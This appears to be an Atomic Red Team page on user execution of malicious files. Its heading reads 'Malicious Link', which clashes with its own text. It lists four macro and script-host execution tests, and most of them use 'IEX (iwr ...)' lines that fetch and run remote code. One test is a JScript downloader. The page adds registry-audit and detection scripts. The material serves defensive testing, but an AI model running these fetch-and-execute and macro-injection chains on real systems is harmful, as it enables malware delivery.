T1204.002
User Execution: Malicious Link
Description from ATT&CK
An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Adversaries may employ various forms of Masquerading and Obfuscated Files or Information to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)
While Malicious File frequently occurs shortly after Initial Access, it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.
Atomic Tests
Atomic Test #1 - OSTap Style Macro Execution
This test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by Invoke-MalDoc, which loads and executes the VBA code in an Excel or Word document.
This is a known execution chain observed in the OSTap downloader commonly used in TrickBot campaigns. Reference: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
Supported Platforms: windows
auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse |
ms_product | Maldoc application Word or Excel | String | Word |
ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0 |
Attack Commands: Run with powershell!

```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
```
Cleanup Commands:

```powershell
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
Dependencies: Run with powershell!
Description: Test requires MS Office to be installed and to have been run previously. Run -GetPrereqs to launch Word and build the dependent registry keys.
Check Prereq Commands:

```powershell
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
```
Get Prereq Commands:

```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
```
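The cleanup and prerequisite commands above show the footprint Invoke-MalDoc leaves behind: it needs the per-user Office security key to exist and sets AccessVBOM under it so that it can inject the macro into the document, and the cleanup removes that value again. The following audit script is an added example, not part of Atomic Red Team or Invoke-MalDoc; it walks every Office version key under HKCU and reports the AccessVBOM value (1 means "Trust access to the VBA project object model" is on) for Word, Excel and PowerPoint, so a defender can spot a workstation where the value was left behind. It also reads VBAWarnings, a related value not mentioned on this page (1 means all macros run without a prompt); the product list and the key layout are assumptions based on the paths the tests use.

```powershell
# Added example (not Atomic Red Team / Invoke-MalDoc code): audit per-user Office
# macro trust settings that the tests above manipulate and clean up.
function Get-OfficeVbaTrustState {
    param(
        # Products are an assumption; the tests on this page use Word and Excel
        [string[]] $Products   = @('Word', 'Excel', 'PowerPoint'),
        [string]   $OfficeRoot = 'HKCU:\Software\Microsoft\Office'
    )
    if (-not (Test-Path -Path $OfficeRoot)) { return }

    # Version subkeys look like 14.0, 15.0, 16.0; skip non-version children
    $versions = Get-ChildItem -Path $OfficeRoot -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^\d+\.\d+$' }

    foreach ($v in $versions) {
        foreach ($p in $Products) {
            # Same key the cleanup command targets: <version>\<product>\Security
            $securityKey = Join-Path -Path $v.PSPath -ChildPath "$p\Security"
            if (-not (Test-Path -Path $securityKey)) { continue }
            $props = Get-ItemProperty -Path $securityKey -ErrorAction SilentlyContinue

            $finding = 'ok'
            if ($props.AccessVBOM -eq 1) {
                # 1 = VBA project object model trusted: macros/COM can read and write VBA silently
                $finding = 'AccessVBOM=1: VBA project object model is trusted; confirm this is expected'
            }
            elseif ($props.VBAWarnings -eq 1) {
                # VBAWarnings is not on this page; 1 = enable all macros without notification
                $finding = 'VBAWarnings=1: all macros run without a prompt'
            }

            [pscustomobject]@{
                Version     = $v.PSChildName
                Product     = $p
                AccessVBOM  = $props.AccessVBOM    # $null when the value is absent
                VBAWarnings = $props.VBAWarnings
                Finding     = $finding
            }
        }
    }
}

Get-OfficeVbaTrustState | Format-Table -AutoSize
```

Running this before and after the test makes the change visible: the Security key for the chosen product shows AccessVBOM = 1 after Invoke-MalDoc runs and the value disappears after the cleanup command. An absent value reads the same as 0 (access not trusted).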
Atomic Test #2 - OSTap Payload Download
Uses cscript //E:jscript to download a file.
Supported Platforms: windows
auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js |
file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt |
Attack Commands: Run with command_prompt!

```cmd
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
```

Note that the generated script never assigns the `filename` variable it passes to `stream.SaveToFile`, so as written the download step fails with a script error once the HTTP request succeeds; the process chain (cmd.exe writing the script, then cscript running it with the JScript engine) is still produced.
Cleanup Commands:

```cmd
del #{script_file} /F /Q >nul 2>&1
```
Atomic Test #3 - Maldoc choice flags command execution
This test uses a VBA macro to execute cmd.exe with flags observed in recent maldocs and second-stage downloaders. Upon execution, cmd.exe will be launched. Execution is handled by Invoke-MalDoc, which loads and executes the VBA code in an Excel or Word document.
Supported Platforms: windows
auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
ms_product | Maldoc application Word or Excel | String | Word |
ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0 |
Attack Commands: Run with powershell!

```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
```
Cleanup Commands:

```powershell
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
Dependencies: Run with powershell!
Description: Test requires MS Office to be installed and to have been run previously. Run -GetPrereqs to launch Word and build the dependent registry keys.
Check Prereq Commands:

```powershell
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
```
Get Prereq Commands:

```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
```
Atomic Test #4 - OSTAP JS version
Malicious JavaScript executing cmd.exe, which spawns wscript.exe //E:jscript.
Execution is handled by Invoke-MalDoc, which loads and executes the VBA code in an Excel or Word document.
Supported Platforms: windows
auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
jse_path | jse file to execute with wscript | Path | C:\Users\Public\art.jse |
ms_product | Maldoc application Word or Excel | String | Word |
ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0 |
Attack Commands: Run with powershell!

```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
```
Cleanup Commands:

```powershell
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
Dependencies: Run with powershell!
Description: Test requires MS Office to be installed and to have been run previously. Run -GetPrereqs to launch Word and build the dependent registry keys.
Check Prereq Commands:

```powershell
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
```
Get Prereq Commands:

```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
```
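All four tests above produce the same kind of telemetry a defender can key on: an Office application (or a cmd.exe it launched) starting a script host, a script host forced onto the JScript engine with //E:jscript, a .jse file run out of C:\Users\Public, and cmd.exe running a timed `choice` prompt as a sleep. The script below is an added example, not part of Atomic Red Team; it runs those checks over a handful of constructed process-creation records whose field names (ParentImage, Image, CommandLine) mirror Sysmon Event ID 1, so it can be pointed at real events exported from a SIEM with the same fields. The sample events and the hypothetical file paths in them are made up for the demonstration; the first four mirror Tests #1, #3, #4 and #2 in turn and the last two are benign noise.

```powershell
# Added example (not Atomic Red Team code): detection logic for the Office ->
# script host / cmd.exe chains exercised by Tests #1-#4, run over constructed
# Sysmon-style process creation records.

$officeHosts = @('WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE')
$scriptHosts = @('cscript.exe', 'wscript.exe', 'cmd.exe', 'powershell.exe')

# Constructed sample telemetry (not real logs). Paths are hypothetical.
$events = @(
    [pscustomobject]@{ ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; Image = 'C:\Windows\System32\cscript.exe'; CommandLine = 'cscript.exe C:\Users\Public\art.jse' }
    [pscustomobject]@{ ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; Image = 'C:\Windows\System32\cmd.exe';     CommandLine = 'cmd.exe /c choice /C Y /N /D Y /T 3' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\cmd.exe';                                  Image = 'C:\Windows\System32\wscript.exe'; CommandLine = 'wscript.exe //E:jscript C:\Users\Public\art.jse' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\cmd.exe';                                  Image = 'C:\Windows\System32\cscript.exe'; CommandLine = 'cscript //E:Jscript C:\Users\analyst\AppData\Local\Temp\OSTapGet.js' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe';                                      Image = 'C:\Windows\System32\notepad.exe'; CommandLine = 'notepad.exe' }
    [pscustomobject]@{ ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; Image = 'C:\Windows\splwow64.exe';          CommandLine = 'splwow64.exe' }
)

function Test-SuspiciousChain {
    param([Parameter(Mandatory)] $Record)

    # Take the file name only; split on either separator so it also works off-Windows
    $parent  = ($Record.ParentImage -split '[\\/]')[-1]
    $child   = ($Record.Image       -split '[\\/]')[-1]
    $cmd     = $Record.CommandLine
    $reasons = @()

    # Office application spawning a script host or command shell (Tests #1, #3, #4)
    if ($officeHosts -contains $parent -and $scriptHosts -contains $child) {
        $reasons += "Office parent $parent spawned $child"
    }
    # Script host forced onto the JScript engine regardless of extension (Tests #2, #4)
    if ($cmd -match '(?i)\b[cw]script(\.exe)?\b.*//E:jscript') {
        $reasons += 'script host run with //E:jscript'
    }
    # .jse executed from the world-writable C:\Users\Public staging path (Tests #1, #4)
    if ($cmd -match '(?i)\\Users\\Public\\.*\.jse') {
        $reasons += '.jse launched from C:\Users\Public'
    }
    # cmd.exe used only to run a timed choice prompt as a delay (Test #3)
    if ($child -ieq 'cmd.exe' -and $cmd -match '(?i)choice\s+/C\s+\w+\s+/N\s+/D\s+\w+\s+/T\s+\d+') {
        $reasons += 'choice-based delay from cmd.exe'
    }

    [pscustomobject]@{
        Parent     = $parent
        Image      = $child
        Suspicious = ($reasons.Count -gt 0)
        Reasons    = ($reasons -join '; ')
    }
}

$events | ForEach-Object { Test-SuspiciousChain -Record $_ } | Format-Table -AutoSize -Wrap
```

On the constructed input, the first four records are flagged (the third and fourth only by the command-line checks, since their parent is cmd.exe rather than Word) and the notepad.exe and splwow64.exe records pass, which is the point of checking the child image against a short script-host list rather than alerting on every Office child process.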